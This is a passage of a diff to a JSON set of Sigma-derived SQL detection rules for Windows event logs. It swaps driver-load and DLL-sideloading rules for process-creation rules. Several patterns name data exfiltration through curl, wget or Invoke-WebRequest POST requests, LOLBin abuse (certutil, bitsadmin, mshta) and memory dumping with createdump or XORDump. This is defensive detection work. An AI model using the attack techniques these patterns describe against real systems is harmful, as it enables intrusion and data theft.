'1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', 
'2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver 
often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "description": "Detects a suspicious svchost process start", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of the Microsoft OneNote application. 
This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "status": "test", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", "attack.t1543.003" ], "falsepositives": [ 
@@ -5668,99 +5500,95 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": 
"9bacc538-d1b9-4d42-862e-469eafc05a41", - "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" + 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE 
